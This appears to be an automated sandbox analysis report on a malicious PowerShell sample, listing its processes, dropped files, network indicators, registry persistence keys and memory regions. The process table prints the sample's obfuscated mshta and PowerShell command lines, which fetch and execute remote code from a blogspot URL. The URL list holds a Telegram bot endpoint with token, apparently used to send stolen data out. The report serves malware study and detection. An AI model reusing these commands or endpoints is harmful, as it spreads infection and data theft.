Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
o3KyzpE7F4.ps1
|
ASCII text, with very long lines (64834)
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x0d960b90, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_114f36841bde2782ceb5e919255ae3656018f8_00000000_7261f982-655b-4a37-acb2-62dfc002047e\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_114f36841bde2782ceb5e919255ae3656018f8_00000000_cfb088d1-9e20-4517-9a57-fc120c8b9284\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC12.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC22.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC62.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC71.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\nippleskulcha\thukanthukai.~!!@@!!@@!!~
|
ASCII text, with very long lines (65535)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\error[1]
|
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\error[1]
|
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0zaed2l.pp3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edu1cji2.000.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhcrz10j.ok1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrbozbkd.tgm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbvflsbx.dsn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5rnlyjj.gop.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twhwfcos.p4u.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxwfgjf5.s0j.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QNXL5CJO929GDZJGR1C2.temp
|
data
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 17 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol
= [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]];
new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm
minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
|
|
|
|
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol
= [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol
= [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]];
new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm
minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
|
|
|
|
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol
= [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
|
dw20.exe -x -s 792
|
||
|
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
|
dw20.exe -x -s 788
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 9 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://www.blogger.com/feeds/3408437705493384378/posts/default?alt=atom
|
unknown
|
||
|
https://api.telegram.org
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://minecap4-22-24.blogspot.com/haha
|
142.251.15.132
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
http://pubsubhubbub.appspot.com/
|
unknown
|
||
|
https://api.ipify.org
|
unknown
|
||
|
http://blogspot.l.googleusercontent.com
|
unknown
|
||
|
http://schemas.google.com/g/2005
|
unknown
|
||
|
https://minecap4-22-24.blogspot.com/haha
|
142.251.15.132
|
||
|
https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument
|
149.154.167.220
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
http://schemas.google.com/g/2005#thumbnail
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://minecap4-22-24.blogspot.com/
|
unknown
|
||
|
https://api.ipify.org/
|
172.67.74.152
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
http://www.blogger.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://a9.com/-/spec/opensearchrss/1.0/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://img1.blogblog.com/img/b16-rounded.gif
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
http://minecap4-22-24.blogspot.com
|
unknown
|
||
|
https://api.ipify.org/t
|
unknown
|
||
|
https://minecap4-22-24.blogspot.
|
unknown
|
||
|
https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocumentLR
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
http://schemas.google.com/blogger/2008
|
unknown
|
||
|
https://minecap4-22-24.blogspot.com/feeds/posts/default
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://minecap4-22-24.blogspot.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.georss.org/georss
|
unknown
|
||
|
http://api.telegram.org
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
http://www.blogger.com/styles/atom.css
|
unknown
|
||
|
https://minecap4-22-24.blogspot.com/atom.xml
|
142.251.15.132
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 40 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
blogspot.l.googleusercontent.com
|
142.251.15.132
|
||
|
api.ipify.org
|
172.67.74.152
|
||
|
ip-api.com
|
208.95.112.1
|
||
|
api.telegram.org
|
149.154.167.220
|
||
|
fp2e7a.wpc.phicdn.net
|
192.229.211.108
|
||
|
minecap4-22-24.blogspot.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.251.15.132
|
blogspot.l.googleusercontent.com
|
United States
|
||
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
|
127.0.0.1
|
unknown
|
unknown
|
||
|
172.67.74.152
|
api.ipify.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
DRAKEXnew2
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
DRAKEXnew1
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
|
ExecutionPolicy
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
FileDirectory
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
ProgramId
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
FileId
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
LongPathHash
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
Name
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
OriginalFileName
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
Publisher
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
Version
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
BinFileVersion
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
BinaryType
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
ProductName
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
ProductVersion
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
LinkDate
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
BinProductVersion
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
Size
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
Language
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
IsOsComponent
|
||
|
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
|
Usn
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 43 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
B9D000
|
remote allocation
|
page execute and read and write
|
|
|
|
286A000
|
trusted library allocation
|
page read and write
|
|
|
|
2829000
|
trusted library allocation
|
page read and write
|
|
|
|
287A000
|
trusted library allocation
|
page read and write
|
|
|
|
15BF000
|
stack
|
page read and write
|
||
|
235C6620000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DFB000
|
trusted library allocation
|
page read and write
|
||
|
261C63F4000
|
heap
|
page read and write
|
||
|
738000
|
stack
|
page read and write
|
||
|
67C0000
|
trusted library allocation
|
page read and write
|
||
|
86943FB000
|
stack
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
219E5772000
|
heap
|
page read and write
|
||
|
219E6191000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page execute and read and write
|
||
|
59F0000
|
heap
|
page read and write
|
||
|
211E2C80000
|
heap
|
page read and write
|
||
|
1EC28479000
|
heap
|
page read and write
|
||
|
2D2AA610000
|
heap
|
page execute and read and write
|
||
|
1530000
|
heap
|
page read and write
|
||
|
1FCCD249000
|
heap
|
page read and write
|
||
|
1F4CB472000
|
heap
|
page read and write
|
||
|
869497E000
|
stack
|
page read and write
|
||
|
A45000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C30000
|
trusted library allocation
|
page read and write
|
||
|
43C1000
|
trusted library allocation
|
page read and write
|
||
|
219E576C000
|
heap
|
page read and write
|
||
|
219E5771000
|
heap
|
page read and write
|
||
|
5150000
|
heap
|
page read and write
|
||
|
235C6855000
|
heap
|
page read and write
|
||
|
86953FE000
|
unkown
|
page readonly
|
||
|
2D2C28E0000
|
heap
|
page read and write
|
||
|
219E6196000
|
heap
|
page read and write
|
||
|
261C4954000
|
heap
|
page read and write
|
||
|
1EC28380000
|
heap
|
page read and write
|
||
|
8694FFE000
|
unkown
|
page readonly
|
||
|
1F42A6A8000
|
trusted library allocation
|
page read and write
|
||
|
28E450C9000
|
heap
|
page read and write
|
||
|
DB7028C000
|
stack
|
page read and write
|
||
|
7FF848FD1000
|
trusted library allocation
|
page read and write
|
||
|
48EE000
|
stack
|
page read and write
|
||
|
5F1D000
|
stack
|
page read and write
|
||
|
219E6196000
|
heap
|
page read and write
|
||
|
28E2D09E000
|
trusted library allocation
|
page read and write
|
||
|
1130000
|
heap
|
page read and write
|
||
|
63A000
|
stack
|
page read and write
|
||
|
E440E3E000
|
stack
|
page read and write
|
||
|
CAE000
|
heap
|
page read and write
|
||
|
28E451B0000
|
heap
|
page read and write
|
||
|
28E4530E000
|
heap
|
page read and write
|
||
|
86941F9000
|
stack
|
page read and write
|
||
|
5020000
|
trusted library allocation
|
page read and write
|
||
|
211E463E000
|
heap
|
page read and write
|
||
|
235C68FF000
|
heap
|
page read and write
|
||
|
1EC28472000
|
heap
|
page read and write
|
||
|
219E61BE000
|
heap
|
page read and write
|
||
|
2D2AB25C000
|
trusted library allocation
|
page read and write
|
||
|
219E57BA000
|
heap
|
page read and write
|
||
|
28E2B270000
|
heap
|
page readonly
|
||
|
28E45121000
|
heap
|
page read and write
|
||
|
211E2DB2000
|
heap
|
page read and write
|
||
|
C30BE4E000
|
stack
|
page read and write
|
||
|
261C63FE000
|
heap
|
page read and write
|
||
|
86956FE000
|
stack
|
page read and write
|
||
|
58F0000
|
heap
|
page execute and read and write
|
||
|
2F7E000
|
stack
|
page read and write
|
||
|
219E57BE000
|
heap
|
page read and write
|
||
|
235C1800000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
219E57DD000
|
heap
|
page read and write
|
||
|
28E2B0C0000
|
heap
|
page read and write
|
||
|
86944FE000
|
unkown
|
page readonly
|
||
|
2D2AA690000
|
heap
|
page read and write
|
||
|
24418B87000
|
trusted library allocation
|
page read and write
|
||
|
235C683E000
|
heap
|
page read and write
|
||
|
A10000
|
trusted library allocation
|
page read and write
|
||
|
219E57CA000
|
heap
|
page read and write
|
||
|
235C6663000
|
trusted library allocation
|
page read and write
|
||
|
2442A875000
|
trusted library allocation
|
page read and write
|
||
|
235C1900000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
1FCCD24B000
|
heap
|
page read and write
|
||
|
8B5000
|
heap
|
page read and write
|
||
|
DB6F279000
|
stack
|
page read and write
|
||
|
235C20E0000
|
trusted library allocation
|
page read and write
|
||
|
AF6000
|
stack
|
page read and write
|
||
|
1F4CB3C0000
|
heap
|
page read and write
|
||
|
24429D3F000
|
trusted library allocation
|
page read and write
|
||
|
FF2000
|
trusted library allocation
|
page execute and read and write
|
||
|
9719F9B000
|
stack
|
page read and write
|
||
|
2442AD14000
|
trusted library allocation
|
page read and write
|
||
|
1EC283C0000
|
heap
|
page read and write
|
||
|
14F0000
|
heap
|
page read and write
|
||
|
E440AFD000
|
stack
|
page read and write
|
||
|
235C6720000
|
trusted library allocation
|
page read and write
|
||
|
1EC28480000
|
heap
|
page read and write
|
||
|
63BE000
|
stack
|
page read and write
|
||
|
2D2AB2F8000
|
trusted library allocation
|
page read and write
|
||
|
235C191A000
|
heap
|
page read and write
|
||
|
235C680D000
|
heap
|
page read and write
|
||
|
1770000
|
heap
|
page read and write
|
||
|
1F42A6A0000
|
trusted library allocation
|
page read and write
|
||
|
235C6634000
|
trusted library allocation
|
page read and write
|
||
|
E44193E000
|
stack
|
page read and write
|
||
|
269C6B80000
|
heap
|
page read and write
|
||
|
2442AD98000
|
trusted library allocation
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
2D2AACF6000
|
trusted library allocation
|
page read and write
|
||
|
10AE000
|
stack
|
page read and write
|
||
|
68A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F42A5B9000
|
heap
|
page read and write
|
||
|
60A0000
|
trusted library allocation
|
page read and write
|
||
|
235C6862000
|
heap
|
page read and write
|
||
|
211E47E0000
|
heap
|
page read and write
|
||
|
24417ED6000
|
heap
|
page read and write
|
||
|
219E6189000
|
heap
|
page read and write
|
||
|
1EC284B3000
|
heap
|
page read and write
|
||
|
D04000
|
heap
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
24416170000
|
heap
|
page read and write
|
||
|
58BE000
|
trusted library allocation
|
page read and write
|
||
|
235C68F6000
|
heap
|
page read and write
|
||
|
FCA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F42A700000
|
trusted library allocation
|
page execute
|
||
|
28E2B14E000
|
heap
|
page read and write
|
||
|
E4406FE000
|
stack
|
page read and write
|
||
|
244292D4000
|
trusted library allocation
|
page read and write
|
||
|
DB6F0FE000
|
stack
|
page read and write
|
||
|
235C6620000
|
trusted library allocation
|
page read and write
|
||
|
2A03000
|
trusted library allocation
|
page read and write
|
||
|
2D2A8980000
|
trusted library allocation
|
page read and write
|
||
|
219E61C3000
|
heap
|
page read and write
|
||
|
DB6F339000
|
stack
|
page read and write
|
||
|
7FF848DE4000
|
trusted library allocation
|
page read and write
|
||
|
E440DBE000
|
stack
|
page read and write
|
||
|
1A60000
|
trusted library allocation
|
page read and write
|
||
|
33C1000
|
trusted library allocation
|
page read and write
|
||
|
F6F000
|
stack
|
page read and write
|
||
|
24417F1E000
|
heap
|
page read and write
|
||
|
1F42A120000
|
heap
|
page read and write
|
||
|
E4408FA000
|
stack
|
page read and write
|
||
|
219E61BD000
|
heap
|
page read and write
|
||
|
211E2E16000
|
heap
|
page read and write
|
||
|
24417A60000
|
heap
|
page read and write
|
||
|
C30AEFE000
|
stack
|
page read and write
|
||
|
1F42A2E0000
|
heap
|
page read and write
|
||
|
2D2AB2F0000
|
trusted library allocation
|
page read and write
|
||
|
27B1000
|
trusted library allocation
|
page read and write
|
||
|
261C496E000
|
heap
|
page read and write
|
||
|
28E450B0000
|
heap
|
page read and write
|
||
|
1EC28464000
|
heap
|
page read and write
|
||
|
235C125C000
|
heap
|
page read and write
|
||
|
219E5770000
|
heap
|
page read and write
|
||
|
219E5773000
|
heap
|
page read and write
|
||
|
235C128B000
|
heap
|
page read and write
|
||
|
7FF848EC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
219E5787000
|
heap
|
page read and write
|
||
|
E4407FE000
|
stack
|
page read and write
|
||
|
C30B0F8000
|
stack
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
FD2000
|
trusted library allocation
|
page execute and read and write
|
||
|
235C12FE000
|
heap
|
page read and write
|
||
|
1EC28690000
|
trusted library allocation
|
page read and write
|
||
|
8694AFC000
|
stack
|
page read and write
|
||
|
